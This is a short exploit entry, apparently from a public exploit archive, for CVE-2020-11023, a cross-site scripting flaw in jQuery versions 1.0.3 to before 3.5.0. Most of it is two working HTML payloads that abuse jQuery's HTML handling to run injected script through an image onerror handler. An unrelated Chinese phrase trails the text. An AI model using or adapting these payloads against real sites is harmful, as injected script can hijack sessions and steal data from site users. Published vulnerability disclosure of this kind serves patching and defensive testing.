# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS) # Date: 04/29/2020 # Exploit Author: Central InfoSec # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0 # CVE : CVE-2020-11023 # Proof of Concept 1: <style><style /><img src=x onerror=alert(1)> # Proof of Concept 2 (Only jQuery 3.x affected): <img alt="<x" title="/><img src=x onerror=alert(1)>">
体验盒子
